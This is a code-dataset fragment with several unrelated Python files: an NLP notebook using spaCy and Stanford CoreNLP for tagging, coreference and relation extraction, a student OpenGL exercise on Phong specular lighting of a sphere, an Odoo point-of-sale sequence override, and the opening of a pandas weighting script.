denominations.')\n#getAllSubjectObjectRelation(parsedText)\n#getAllSubjectObjectRelation(getParseDataFromTextDict(text))\n\n\n# In[16]:\n\n\n# content = open('C:\\\\Saheb\\\\Projects\\\\Ontology creation\\\\Content downloaded from Internet\\\\Financial Law_html_0_cleaned.txt', encoding='utf8').read()\n\n# for contentSplit in content.split('\\n'):\n# for sentence in nltk.sent_tokenize(contentSplit):\n# print(sentence)\n# parsedText = getParseDataFromText(sentence)\n# #print(parsedText)\n# print(getAllSubjectObjectRelation(parsedText))\n# print('\\n')\n\n\n# In[17]:\n\n\n# from subject_object_extraction import findSVOs\n\n# # can still work even without punctuation\n# for contentSplit in content.split('\\n'):\n# for sentence in nltk.sent_tokenize(contentSplit):\n# print(sentence)\n# parse = nlp(sentence)\n# print(findSVOs(parse))\n# print()\n\n\n# ### Using spacy vector similarity function\n\n# In[18]:\n\n\ndef getSimilarity(word1, word2):\n tokens = nlp(word1+\" \"+word2)\n return tokens[0].similarity(tokens[1])\n\n\n# ## Stanford CoreNLP\n\n# In[1]:\n\n\nfrom pycorenlp import StanfordCoreNLP\nstanford_nlp = StanfordCoreNLP('http://localhost:9001')\n\n\n# ### Pos tagging\n\n# In[2]:\n\n\ndef getPOSTaggedDataFromTextUsingStanford(text):\n posSentences = []\n output = stanford_nlp.annotate(text, properties={'annotators': 'tokenize,ssplit,pos','outputFormat': 'json'})\n for s in output['sentences']:\n posSentences.append(\" \".join([t[\"word\"]+\"/\"+t[\"pos\"] for t in s[\"tokens\"]]))\n return posSentences\n\n\n# ### Named entity tagging\n\n# In[4]:\n\n\ndef getNERDataFromText(text):\n nerSentences = []\n output = stanford_nlp.annotate(text, properties={'annotators': 'tokenize, ssplit, pos, lemma,ner','outputFormat': 'json'})\n for s in output['sentences']:\n #print (\"NER:\\t\", \" \".join([t[\"word\"]+\"/\"+t[\"ner\"]+\"/\"+t[\"pos\"] for t in s[\"tokens\"]]))\n nerSentences.append(\" \".join([t[\"word\"]+\"/\"+t[\"ner\"]+\"/\"+t[\"pos\"] for t in s[\"tokens\"]]))\n return nerSentences\n#getNERDataFromText('Allegra Knopf Esq, Florida BarNo. 307660')\n\n\n# ### Corenlp Coreference resolution\n\n# In[21]:\n\n\n#inputText= 'Messi was the first to win Euro cup. He is also the highest score of all time.'\ndef getCoreference(text):\n output = stanford_nlp.annotate(text, properties={'annotators': 'tokenize, ssplit, pos, lemma, ner, parse, dcoref','outputFormat': 'json'})\n #print(output['corefs'])\n sentList = []\n for sentenceJSONStr in output['sentences']:\n sentList.append(\" \".join([t[\"word\"] for t in sentenceJSONStr[\"tokens\"]]))\n \n # Format will be sent Num/reference : sentNum/referenceTo\n reference_dict = {}\n for keyIterate in output['corefs'].keys():\n reference = ''\n referenceTo = ''\n if len(output['corefs'][keyIterate])>1:\n for jsonStr in output['corefs'][keyIterate]:\n if jsonStr['isRepresentativeMention'] == True:\n reference = str(jsonStr['sentNum']) + \"/\" + jsonStr['text']\n elif jsonStr['isRepresentativeMention'] == False:\n referenceTo = str(jsonStr['sentNum']) + \"/\" + jsonStr['text']\n reference_dict[reference] = referenceTo\n print(reference_dict)\n for reference in reference_dict.keys():\n referenceTo = reference_dict[reference].split(\"/\")\n # -1 for sentence index\n sentList[int(referenceTo[0])-1] = sentList[int(referenceTo[0]) - 1].replace(referenceTo[1], reference.split(\"/\")[1]) \n return sentList\n\n#getCoreference('MB Financial in Chicago is shutting down its national mortgage business.The $20 billion-asset company that the decision was based on recent economic changes, heavy competition, “very low” margins and input from shareholders')\n\n\n# In[22]:\n\n\n#getSimilarity('mortgage_loan', 'home_loan')\n\n\n# In[23]:\n\n\n#getPOSTaggedDataFromTextUsingStanford('he difference between a mortgage banker and a mortgage broker is that the mortgage banker funds loans with its own capital.')\n\n\n# In[24]:\n\n\n# text = 'Mortgage bank is a bank that specializes in originating and/or servicing mortgage loans.'\n# output = stanford_nlp.annotate(text, properties={'annotators': 'tokenize, ssplit, pos, lemma, ner, parse, dcoref','outputFormat': 'json'})\n# print(output['corefs'])\n# sentList = []\n# for sentenceJSONStr in output['sentences']:\n# sentList.append(\" \".join([t[\"word\"] for t in sentenceJSONStr[\"tokens\"]]))\n\n# # Format will be sent Num/reference : sentNum/referenceTo\n# reference_dict = {}\n# for keyIterate in output['corefs'].keys():\n# reference = ''\n# referenceTo = ''\n# if len(output['corefs'][keyIterate])>1:\n# for jsonStr in output['corefs'][keyIterate]:\n# if jsonStr['isRepresentativeMention'] == True:\n# reference = str(jsonStr['sentNum']) + \"/\" + jsonStr['text']\n# elif jsonStr['isRepresentativeMention'] == False:\n# referenceTo = str(jsonStr['sentNum']) + \"/\" + jsonStr['text']\n# reference_dict[reference] = referenceTo\n# print(reference_dict)\n# for reference in reference_dict.keys():\n# referenceTo = reference_dict[reference].split(\"/\")\n# # -1 for sentence index\n# sentList[int(referenceTo[0])-1] = sentList[int(referenceTo[0]) - 1].replace(referenceTo[1], reference.split(\"/\")[1]) \n# sentList\n\n\n# ### Finding entity relations\n# \n# #### Format for the returned object\n# * (Index, Token, POS, Relation (if any))\n# * Relation can be S -> subject, R -> Relation, O -> Object\n\n# In[32]:\n\n\ndef getRelationBetweenEntitiesUsingStanford(sentence):\n sentenceRelation = []\n output = stanford_nlp.annotate(sentence, properties={\"annotators\":\"tokenize,ssplit,pos,depparse,natlog,openie\",\n \"outputFormat\": \"json\",\n \"openie.triple.strict\":\"true\",\n \"openie.max_entailments_per_clause\":\"1\"})\n for sentence in output['sentences']:\n print(sentence['openie'])\n for word in output['sentences'][0]['tokens']:\n isFound = False\n num=0\n for temp in sentence['openie']:\n num+=1\n if word['index'] > temp['subjectSpan'][0] and word['index'] <= temp['subjectSpan'][1]:\n sentenceRelation.append((word['index'], word['originalText'], word['pos'], 'S' + str(num), ''))\n isFound = True\n break\n if word['index'] > temp['relationSpan'][0] and word['index'] <= temp['relationSpan'][1]:\n sentenceRelation.append((word['index'], word['originalText'], word['pos'], 'R' + str(num), temp['relation']))\n isFound = True\n break\n if word['index'] > temp['objectSpan'][0] and word['index'] <= temp['objectSpan'][1]:\n sentenceRelation.append((word['index'], word['originalText'], word['pos'], 'O' + str(num), ''))\n isFound = True\n break\n if not isFound:\n sentenceRelation.append((word['index'], word['originalText'], word['pos'], '', ''))\n return sentenceRelation\n\n\n# In[33]:\n\n\ndef updateTuple(relationsTemp, tuple_to_update):\n relationsTempNew = []\n for index in range(0, len(relationsTemp)):\n relation = relationsTemp[index]\n if index in tuple_to_update.keys():\n relationsTempNew.append((relation[0], relation[1], relation[2], tuple_to_update[index], relation[4]))\n else:\n relationsTempNew.append(relation)\n return relationsTempNew\n\n\n# In[34]:\n\n\ndef reviseSubjectObject(relations):\n tuple_to_update = {}\n for index in range(0, len(relations)):\n relation = relations[index]\n ## Checking Subject\n if relation[3] !='' and relation[3].startswith('S'):\n for index1 in reversed(range(0, index)):\n if relations[index1][2] in ['NN', 'NNS', 'NNP', 'JJ'] and relations[index1][3] != relation[3]:\n tuple_to_update[index1] = relation[3]\n else:\n break\n \n for index1 in range(index+1, len(relations)):\n if relations[index1][2] in ['NN', 'NNS', 'NNP', 'JJ'] and relations[index1][3] != relation[3]:\n tuple_to_update[index1] = relation[3]\n else:\n break\n ## Checking Object\n elif relation[3] !='' and relation[3].startswith('O'):\n for index1 in reversed(range(0, index)):\n if relations[index1][2] in ['NN', 'NNS', 'NNP', 'JJ'] and relations[index1][3] != relation[3]:\n tuple_to_update[index1] = relation[3]\n else:\n break\n \n for index1 in range(index+1, len(relations)):\n if relations[index1][2] in ['NN', 'NNS', 'NNP', 'JJ'] and relations[index1][3] != relation[3]:\n tuple_to_update[index1] = relation[3]\n else:\n break \n relations_new = updateTuple(relations, tuple_to_update)\n return relations_new\n\n\n# In[36]:\n\n\n## testing relation finding\n#sent = 'To prevent discrimination in the credit-granting process, the regulation imposes a delicate balance between the creditor’s need to know as much as possible about a prospective borrower with the borrower’s right not to disclose information irrelevant to the credit transaction as well as relevant information that is likely to be used in connection with discrimination on a prohibited basis. To this end, the regulation addresses taking, evaluating, and acting on applications as well as furnishing and maintaining credit information.'\n#relations = getRelationBetweenEntitiesUsingStanford(sent)\n#print(relations)\n#reviseSubjectObject(relations)\n\n\n# In[37]:\n\n\n# subj_rel_obj_dict = {}\n\n# for line in open('C:\\Saheb\\Projects\\Ontology creation\\Wikipedia documents\\HTML_And_Cleaned_Text\\\\equity funds_cleaned.txt').read().split('\\n'):\n# for sent in nltk.sent_tokenize(line):\n# rel_map = {}\n# relations = getRelationBetweenEntitiesUsingStanford(sent)\n# for relation in reviseSubjectObject(relations):\n# if relation[3]!='': \n# if relation[3] in rel_map:\n# rel_map[relation[3]] = rel_map[relation[3]] + ' ' + relation[1]\n# else:\n# rel_map[relation[3]] = relation[1]\n \n# for index in range(1, len(rel_map)):\n# S_index = 'S'+str(index)\n# O_index = 'O'+str(index)\n# R_index = 'R'+str(index)\n# if S_index in rel_map or O_index in rel_map or R_index in rel_map:\n# S = ''\n# R = ''\n# O = ''\n# if S_index in rel_map:\n# S =rel_map[S_index]\n# if R_index in rel_map:\n# R =rel_map[R_index]\n# if O_index in rel_map:\n# O =rel_map[O_index]\n \n# print((S, R, O))\n# else:\n# break\n \n# print()\n\n\n# #### End of enitty relation extraction \n","sub_path":"Spacy_Tagging.py","file_name":"Spacy_Tagging.py","file_ext":"py","file_size_in_byte":21001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"570899912","text":"\"\"\" AULA 12 - Parte 2\nAluno: Richard Calderan\nUSP: 3672382\nExercício\nAplique o modelo de iluminação especular em uma esfera.\n\nFaça com que o parâmetro expoente de reflexão especular seja incrementado/decrementado por alguma tecla. OBS: faça incremento na potência de dois.\nbotões R, F, T, G\n\"\"\"\n\nimport glfw\nfrom OpenGL.GL import *\nimport OpenGL.GL.shaders\nimport numpy as np\nimport glm\nimport math\nfrom PIL import Image\n\nglfw.init()\nglfw.window_hint(glfw.VISIBLE, glfw.FALSE);\naltura = 900\nlargura = 900\nwindow = glfw.create_window(largura, altura, \"Iluminação especular (phong)\", None, None)\nglfw.make_context_current(window)\n\nvertex_code = \"\"\"\n attribute vec3 position;\n attribute vec2 texture_coord;\n attribute vec3 normals;\n \n \n varying vec2 out_texture;\n varying vec3 out_fragPos;\n varying vec3 out_normal;\n \n uniform mat4 model;\n uniform mat4 view;\n uniform mat4 projection; \n \n void main(){\n gl_Position = projection * view * model * vec4(position,1.0);\n out_texture = vec2(texture_coord);\n out_fragPos = vec3(model * vec4(position, 1.0));\n out_normal = normals; \n }\n \"\"\"\nfragment_code = \"\"\"\n\n // parametros da iluminacao ambiente e difusa\n uniform vec3 lightPos; // define coordenadas de posicao da luz\n uniform float ka; // coeficiente de reflexao ambiente\n uniform float kd; // coeficiente de reflexao difusa\n \n // parametros da iluminacao especular\n uniform vec3 viewPos; // define coordenadas com a posicao da camera/observador\n uniform float ks; // coeficiente de reflexao especular\n uniform float ns; // expoente de reflexao especular\n \n // parametro com a cor da(s) fonte(s) de iluminacao\n vec3 lightColor = vec3(1.0, 1.0, 1.0);\n\n // parametros recebidos do vertex shader\n varying vec2 out_texture; // recebido do vertex shader\n varying vec3 out_normal; // recebido do vertex shader\n varying vec3 out_fragPos; // recebido do vertex shader\n uniform sampler2D samplerTexture;\n \n \n \n void main(){\n \n // calculando reflexao ambiente\n vec3 ambient = ka * lightColor; \n \n // calculando reflexao difusa\n vec3 norm = normalize(out_normal); // normaliza vetores perpendiculares\n vec3 lightDir = normalize(lightPos - out_fragPos); // direcao da luz\n float diff = max(dot(norm, lightDir), 0.0); // verifica limite angular (entre 0 e 90)\n vec3 diffuse = kd * diff * lightColor; // iluminacao difusa\n \n // calculando reflexao especular\n vec3 viewDir = normalize(viewPos - out_fragPos); // direcao do observador/camera\n vec3 reflectDir = reflect(-lightDir, norm); // direcao da reflexao\n float spec = pow(max(dot(viewDir, reflectDir), 0.0), ns);\n vec3 specular = ks * spec * lightColor; \n \n // aplicando o modelo de iluminacao\n vec4 texture = texture2D(samplerTexture, out_texture);\n vec4 result = vec4((ambient + diffuse + specular),1.0) * texture; // aplica iluminacao\n gl_FragColor = result;\n\n }\n \"\"\"\n# Request a program and shader slots from GPU\nprogram = glCreateProgram()\nvertex = glCreateShader(GL_VERTEX_SHADER)\nfragment = glCreateShader(GL_FRAGMENT_SHADER)\n\n# Set shaders source\nglShaderSource(vertex, vertex_code)\nglShaderSource(fragment, fragment_code)\n\n\n# Compile shaders\nglCompileShader(vertex)\nif not glGetShaderiv(vertex, GL_COMPILE_STATUS):\n error = glGetShaderInfoLog(vertex).decode()\n print(error)\n raise RuntimeError(\"Erro de compilacao do Vertex Shader\")\n\nglCompileShader(fragment)\nif not glGetShaderiv(fragment, GL_COMPILE_STATUS):\n error = glGetShaderInfoLog(fragment).decode()\n print(error)\n raise RuntimeError(\"Erro de compilacao do Fragment Shader\")\n\n# Attach shader objects to the program\nglAttachShader(program, vertex)\nglAttachShader(program, fragment)\n\n# Build program\nglLinkProgram(program)\nif not glGetProgramiv(program, GL_LINK_STATUS):\n print(glGetProgramInfoLog(program))\n raise RuntimeError('Linking error')\n \n# Make program the default program\nglUseProgram(program)\n\ndef load_model_from_file(filename):\n \"\"\"Loads a Wavefront OBJ file. \"\"\"\n objects = {}\n vertices = []\n normals = []\n texture_coords = []\n faces = []\n\n material = None\n\n # abre o arquivo obj para leitura\n for line in open(filename, \"r\"): ## para cada linha do arquivo .obj\n if line.startswith('#'): continue ## ignora comentarios\n values = line.split() # quebra a linha por espaço\n if not values: continue\n\n\n ### recuperando vertices\n if values[0] == 'v':\n vertices.append(values[1:4])\n\n ### recuperando vertices\n if values[0] == 'vn':\n normals.append(values[1:4])\n\n ### recuperando coordenadas de textura\n elif values[0] == 'vt':\n texture_coords.append(values[1:3])\n\n ### recuperando faces \n elif values[0] in ('usemtl', 'usemat'):\n material = values[1]\n elif values[0] == 'f':\n face = []\n face_texture = []\n face_normals = []\n for v in values[1:]:\n w = v.split('/')\n face.append(int(w[0]))\n face_normals.append(int(w[2]))\n if len(w) >= 2 and len(w[1]) > 0:\n face_texture.append(int(w[1]))\n else:\n face_texture.append(0)\n\n faces.append((face, face_texture, face_normals, material))\n\n model = {}\n model['vertices'] = vertices\n model['texture'] = texture_coords\n model['faces'] = faces\n model['normals'] = normals\n\n return model\n \nglEnable(GL_TEXTURE_2D)\nqtd_texturas = 10\ntextures = glGenTextures(qtd_texturas)\n\ndef load_texture_from_file(texture_id, img_textura):\n glBindTexture(GL_TEXTURE_2D, texture_id)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_REPEAT)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_REPEAT)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)\n img = Image.open(img_textura)\n img_width = img.size[0]\n img_height = img.size[1]\n image_data = img.tobytes(\"raw\", \"RGB\", 0, -1)\n #image_data = np.array(list(img.getdata()), np.uint8)\n glTexImage2D(GL_TEXTURE_2D, 0, GL_RGB, img_width, img_height, 0, GL_RGB, GL_UNSIGNED_BYTE, image_data)\n \nvertices_list = [] \nnormals_list = [] \ntextures_coord_list = []\n\n\nmodelo = load_model_from_file('caixa1.obj')\n### inserindo vertices do modelo no vetor de vertices\nprint('Processando modelo caixa1.obj. Vertice inicial:',len(vertices_list))\nfor face in modelo['faces']:\n for vertice_id in face[0]:\n vertices_list.append( modelo['vertices'][vertice_id-1] )\n for texture_id in face[1]:\n textures_coord_list.append( modelo['texture'][texture_id-1] )\n for normal_id in face[2]:\n normals_list.append( modelo['normals'][normal_id-1] )\nprint('Processando modelo caixa1.obj. Vertice final:',len(vertices_list))\n\n### inserindo coordenadas de textura do modelo no vetor de texturas\n\n\n### carregando textura equivalente e definindo um id (buffer): use um id por textura!\nload_texture_from_file(0,'caixa_azul.jpg')\n\n\nmodelo = load_model_from_file('luz.obj')\n### inserindo vertices do modelo no vetor de vertices\nprint('Processando modelo luz.obj. Vertice inicial:',len(vertices_list))\nfor face in modelo['faces']:\n for vertice_id in face[0]:\n vertices_list.append( modelo['vertices'][vertice_id-1] )\n for texture_id in face[1]:\n textures_coord_list.append( modelo['texture'][texture_id-1] )\n for normal_id in face[2]:\n normals_list.append( modelo['normals'][normal_id-1] )\nprint('Processando modelo luz.obj.obj. Vertice final:',len(vertices_list))\nload_texture_from_file(1,'luz.png')\n\n\nmodelo = load_model_from_file('esfera.obj')\n### inserindo vertices do modelo no vetor de vertices\nprint('Processando modelo esfera.obj. Vertice inicial:',len(vertices_list))\nfor face in modelo['faces']:\n for vertice_id in face[0]:\n vertices_list.append( modelo['vertices'][vertice_id-1] )\n for texture_id in face[1]:\n textures_coord_list.append( modelo['texture'][texture_id-1] )\n for normal_id in face[2]:\n normals_list.append( modelo['normals'][normal_id-1] )\nprint('Processando modelo esfera.obj. Vertice final:',len(vertices_list))\n\n# Request a buffer slot from GPU\nbuffer = glGenBuffers(3)\n\nvertices = np.zeros(len(vertices_list), [(\"position\", np.float32, 3)])\nvertices['position'] = vertices_list\n\n\n# Upload data\nglBindBuffer(GL_ARRAY_BUFFER, buffer[0])\nglBufferData(GL_ARRAY_BUFFER, vertices.nbytes, vertices, GL_STATIC_DRAW)\nstride = vertices.strides[0]\noffset = ctypes.c_void_p(0)\nloc_vertices = glGetAttribLocation(program, \"position\")\nglEnableVertexAttribArray(loc_vertices)\nglVertexAttribPointer(loc_vertices, 3, GL_FLOAT, False, stride, offset)\n\ntextures = np.zeros(len(textures_coord_list), [(\"position\", np.float32, 2)]) # duas coordenadas\ntextures['position'] = textures_coord_list\n\n\n# Upload data\nglBindBuffer(GL_ARRAY_BUFFER, buffer[1])\nglBufferData(GL_ARRAY_BUFFER, textures.nbytes, textures, GL_STATIC_DRAW)\nstride = textures.strides[0]\noffset = ctypes.c_void_p(0)\nloc_texture_coord = glGetAttribLocation(program, \"texture_coord\")\nglEnableVertexAttribArray(loc_texture_coord)\nglVertexAttribPointer(loc_texture_coord, 2, GL_FLOAT, False, stride, offset)\n\nnormals = np.zeros(len(normals_list), [(\"position\", np.float32, 3)]) # três coordenadas\nnormals['position'] = normals_list\n\n\n# Upload coordenadas normals de cada vertice\nglBindBuffer(GL_ARRAY_BUFFER, buffer[2])\nglBufferData(GL_ARRAY_BUFFER, normals.nbytes, normals, GL_STATIC_DRAW)\nstride = normals.strides[0]\noffset = ctypes.c_void_p(0)\nloc_normals_coord = glGetAttribLocation(program, \"normals\")\nglEnableVertexAttribArray(loc_normals_coord)\nglVertexAttribPointer(loc_normals_coord, 3, GL_FLOAT, False, stride, offset)\n\nloc_light_pos = glGetUniformLocation(program, \"lightPos\") # recuperando localizacao da variavel lightPos na GPU\n\n\ndef desenha_caixa(): \n\n # aplica a matriz model\n angle = 0.0\n \n r_x = 0.0; r_y = 1.0; r_z = 0.0;\n \n # translacao\n t_x = 0.0; t_y = 0.0; t_z = 0.0;\n \n # escala\n s_x = 1.0; s_y = 1.0; s_z = 1.0;\n \n mat_model = model(angle, r_x, r_y, r_z, t_x, t_y, t_z, s_x, s_y, s_z)\n loc_model = glGetUniformLocation(program, \"model\")\n glUniformMatrix4fv(loc_model, 1, GL_TRUE, mat_model)\n \n \n #### define parametros de ilumincao do modelo\n ka = 0.3 # coeficiente de reflexao ambiente do modelo\n kd = 0.3 # coeficiente de reflexao difusa do modelo\n ks = 0.9 # coeficiente de reflexao especular do modelo\n ns = 64.0 # expoente de reflexao especular\n \n loc_ka = glGetUniformLocation(program, \"ka\") # recuperando localizacao da variavel ka na GPU\n glUniform1f(loc_ka, ka) ### envia ka pra gpu\n \n loc_kd = glGetUniformLocation(program, \"kd\") # recuperando localizacao da variavel kd na GPU\n glUniform1f(loc_kd, kd) ### envia kd pra gpu \n \n loc_ks = glGetUniformLocation(program, \"ks\") # recuperando localizacao da variavel ks na GPU\n glUniform1f(loc_ks, ks) ### envia ks pra gpu \n \n loc_ns = glGetUniformLocation(program, \"ns\") # recuperando localizacao da variavel ns na GPU\n glUniform1f(loc_ns, ns) ### envia ns pra gpu \n\n \n #define id da textura do modelo\n glBindTexture(GL_TEXTURE_2D, 0)\n \n \n # desenha o modelo\n glDrawArrays(GL_TRIANGLES, 0, 36) ## renderizando\n\ndef desenha_luz(t_x, t_y, t_z):\n \n\n # aplica a matriz model\n angle = 0.0\n \n r_x = 0.0; r_y = 0.0; r_z = 1.0;\n \n # translacao\n #t_x = 0.0; t_y = 0.0; t_z = 0.0;\n \n # escala\n s_x = 0.1; s_y = 0.1; s_z = 0.1;\n \n mat_model = model(angle, r_x, r_y, r_z, t_x, t_y, t_z, s_x, s_y, s_z)\n loc_model = glGetUniformLocation(program, \"model\")\n glUniformMatrix4fv(loc_model, 1, GL_TRUE, mat_model)\n \n \n #### define parametros de ilumincao do modelo\n ka = 1 # coeficiente de reflexao ambiente do modelo\n kd = 1 # coeficiente de reflexao difusa do modelo\n ks = 1 # coeficiente de reflexao especular do modelo\n ns = 1000.0 # expoente de reflexao especular\n \n loc_ka = glGetUniformLocation(program, \"ka\") # recuperando localizacao da variavel ka na GPU\n glUniform1f(loc_ka, ka) ### envia ka pra gpu\n \n loc_kd = glGetUniformLocation(program, \"kd\") # recuperando localizacao da variavel kd na GPU\n glUniform1f(loc_kd, kd) ### envia kd pra gpu \n \n loc_ks = glGetUniformLocation(program, \"ks\") # recuperando localizacao da variavel ks na GPU\n glUniform1f(loc_ks, ks) ### envia ns pra gpu \n \n loc_ns = glGetUniformLocation(program, \"ns\") # recuperando localizacao da variavel ns na GPU\n glUniform1f(loc_ns, ns) ### envia ns pra gpu \n \n loc_light_pos = glGetUniformLocation(program, \"lightPos\") # recuperando localizacao da variavel lightPos na GPU\n glUniform3f(loc_light_pos, t_x, t_y, t_z) ### posicao da fonte de luz\n \n \n #define id da textura do modelo\n glBindTexture(GL_TEXTURE_2D, 1)\n \n \n # desenha o modelo\n glDrawArrays(GL_TRIANGLES, 36, 72-36) ## renderizando\n\n\n\nks = 0.9 # coeficiente de reflexao especular do modelo\nns = 32.0 # expoente de reflexao especular\n\ndef desenha_esfera(): \n global ks,ns\n # aplica a matriz model\n angle = 0.0\n \n r_x = 0.0; r_y = 1.0; r_z = 0.0;\n \n # translacao\n t_x = 0.0; t_y = 0.0; t_z = 0.0;\n \n # escala\n s_x = 1.0; s_y = 1.0; s_z = 1.0;\n \n mat_model = model(angle, r_x, r_y, r_z, t_x, t_y, t_z, s_x, s_y, s_z)\n loc_model = glGetUniformLocation(program, \"model\")\n glUniformMatrix4fv(loc_model, 1, GL_TRUE, mat_model)\n \n \n #### define parametros de ilumincao do modelo\n ka = 0.3 # coeficiente de reflexao ambiente do modelo\n kd = 0.3 # coeficiente de reflexao difusa do modelo\n \n loc_ka = glGetUniformLocation(program, \"ka\") # recuperando localizacao da variavel ka na GPU\n glUniform1f(loc_ka, ka) ### envia ka pra gpu\n \n loc_kd = glGetUniformLocation(program, \"kd\") # recuperando localizacao da variavel kd na GPU\n glUniform1f(loc_kd, kd) ### envia kd pra gpu \n \n loc_ks = glGetUniformLocation(program, \"ks\") # recuperando localizacao da variavel ks na GPU\n glUniform1f(loc_ks, ks) ### envia ks pra gpu \n \n loc_ns = glGetUniformLocation(program, \"ns\") # recuperando localizacao da variavel ns na GPU\n glUniform1f(loc_ns, ns) ### envia ns pra gpu \n\n \n #define id da textura do modelo\n glBindTexture(GL_TEXTURE_2D, 0)\n \n \n # desenha o modelo\n glDrawArrays(GL_TRIANGLES, 72, 46152-72) ## renderizando\n\n\ncameraPos = glm.vec3(0.0, 0.0, 1.0);\ncameraFront = glm.vec3(0.0, 0.0, -1.0);\ncameraUp = glm.vec3(0.0, 1.0, 0.0);\n\n\npolygonal_mode = False\n\n\nn=2 #expoente\ndef key_event(window,key,scancode,action,mods):\n global cameraPos, cameraFront, cameraUp, polygonal_mode, ks,ns,n\n \n cameraSpeed = 0.05\n if key == 87 and (action==1 or action==2): # tecla W\n cameraPos += cameraSpeed * cameraFront\n \n if key == 83 and (action==1 or action==2): # tecla S\n cameraPos -= cameraSpeed * cameraFront\n \n if key == 65 and (action==1 or action==2): # tecla A\n cameraPos -= glm.normalize(glm.cross(cameraFront, cameraUp)) * cameraSpeed\n \n if key == 68 and (action==1 or action==2): # tecla D\n cameraPos += glm.normalize(glm.cross(cameraFront, cameraUp)) * cameraSpeed\n \n if key == 80 and action==1 and polygonal_mode==True:\n polygonal_mode=False\n else:\n if key == 80 and action==1 and polygonal_mode==False:\n polygonal_mode=True\n \n if key == 82 and (action==1 or action==2): # tecla T\n ks+=0.1\n print(\"ks \",ks)\n if key == 70 and (action==1 or action==2): # tecla G\n ks-=0.1\n print(\"ks \",ks)\n \n if key == 84 and (action==1 or action==2): # tecla R\n n+=.5\n ns=2**n\n print(\"ns \",ns)\n \n if key == 71 and (action==1 or action==2): # tecla F\n n-=.5\n ns=2**n\n print(\"ns \",ns)\n\n \nfirstMouse = True\nyaw = -90.0 \npitch = 0.0\nlastX = largura/2\nlastY = altura/2\n\ndef mouse_event(window, xpos, ypos):\n global firstMouse, cameraFront, yaw, pitch, lastX, lastY\n if firstMouse:\n lastX = xpos\n lastY = ypos\n firstMouse = False\n\n xoffset = xpos - lastX\n yoffset = lastY - ypos\n lastX = xpos\n lastY = ypos\n\n sensitivity = 0.3 \n xoffset *= sensitivity\n yoffset *= sensitivity\n\n yaw += xoffset;\n pitch += yoffset;\n\n \n if pitch >= 90.0: pitch = 90.0\n if pitch <= -90.0: pitch = -90.0\n\n front = glm.vec3()\n front.x = math.cos(glm.radians(yaw)) * math.cos(glm.radians(pitch))\n front.y = math.sin(glm.radians(pitch))\n front.z = math.sin(glm.radians(yaw)) * math.cos(glm.radians(pitch))\n cameraFront = glm.normalize(front)\n\n\n \nglfw.set_key_callback(window,key_event)\nglfw.set_cursor_pos_callback(window, mouse_event)\n\ndef model(angle, r_x, r_y, r_z, t_x, t_y, t_z, s_x, s_y, s_z):\n \n angle = math.radians(angle)\n \n matrix_transform = glm.mat4(1.0) # instanciando uma matriz identidade\n \n # aplicando rotacao\n matrix_transform = glm.rotate(matrix_transform, angle, glm.vec3(r_x, r_y, r_z))\n \n \n # aplicando translacao\n matrix_transform = glm.translate(matrix_transform, glm.vec3(t_x, t_y, t_z)) \n \n # aplicando escala\n matrix_transform = glm.scale(matrix_transform, glm.vec3(s_x, s_y, s_z))\n \n matrix_transform = np.array(matrix_transform).T # pegando a transposta da matriz (glm trabalha com ela invertida)\n \n return matrix_transform\n\ndef view():\n global cameraPos, cameraFront, cameraUp\n mat_view = glm.lookAt(cameraPos, cameraPos + cameraFront, cameraUp);\n mat_view = np.array(mat_view)\n return mat_view\n\ndef projection():\n global altura, largura\n # perspective parameters: fovy, aspect, near, far\n mat_projection = glm.perspective(glm.radians(45.0), largura/altura, 0.1, 1000.0)\n mat_projection = np.array(mat_projection) \n return mat_projection\n \nglfw.show_window(window)\nglfw.set_cursor_pos(window, lastX, lastY)\n\nglEnable(GL_DEPTH_TEST) ### importante para 3D\n \nang = 0.1\n \nwhile not glfw.window_should_close(window):\n\n glfw.poll_events() \n \n \n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n \n #glClearColor(0.2, 0.2, 0.2, 1.0)\n \n if polygonal_mode==True:\n glPolygonMode(GL_FRONT_AND_BACK,GL_LINE)\n if polygonal_mode==False:\n glPolygonMode(GL_FRONT_AND_BACK,GL_FILL)\n \n desenha_esfera() \n #ang+=0.02\n x= np.cos(ang)*4\n z= np.sin(ang)*4\n desenha_luz(x, 0.0, z) \n\n \n mat_view = view()\n loc_view = glGetUniformLocation(program, \"view\")\n glUniformMatrix4fv(loc_view, 1, GL_FALSE, mat_view)\n\n mat_projection = projection()\n loc_projection = glGetUniformLocation(program, \"projection\")\n glUniformMatrix4fv(loc_projection, 1, GL_FALSE, mat_projection) \n \n # atualizando a posicao da camera/observador na GPU para calculo da reflexao especular\n loc_view_pos = glGetUniformLocation(program, \"viewPos\") # recuperando localizacao da variavel viewPos na GPU\n glUniform3f(loc_view_pos, cameraPos[0], cameraPos[1], cameraPos[2]) ### posicao da camera/observador (x,y,z)\n \n glfw.swap_buffers(window)\n\nglfw.terminate()","sub_path":"aula12/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":19911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"640734176","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models, _\n\n\nclass POSOrder(models.Model):\n\t_inherit = 'pos.order'\n\n\t@api.model\n\tdef _order_fields(self, ui_order):\n\t\tres = super(POSOrder, self)._order_fields(ui_order)\n\t\tpos_session = self.env['pos.session'].browse(ui_order['pos_session_id'])\n\t\tif pos_session.sequence_number <= ui_order['sequence_number']:\n\t\t\tpos_session.write({'sequence_number': ui_order['sequence_number'] + 1})\n\t\t\tpos_session.refresh()\n\t\treturn res\n","sub_path":"mai_pos_custom_order_number-13.0.13.1.1.1/mai_pos_custom_order_number/models/pos_order.py","file_name":"pos_order.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"290654482","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport pandas as pd\n\ndef Weighting():\n \n # #### Import Daily Count Stacked File *(refresh that file with stacker program)*\n \n # In[2]:\n \n df = pd.read_excel(r\"S:\\MarketFo\\Short eCSI Raw Data\\Merged 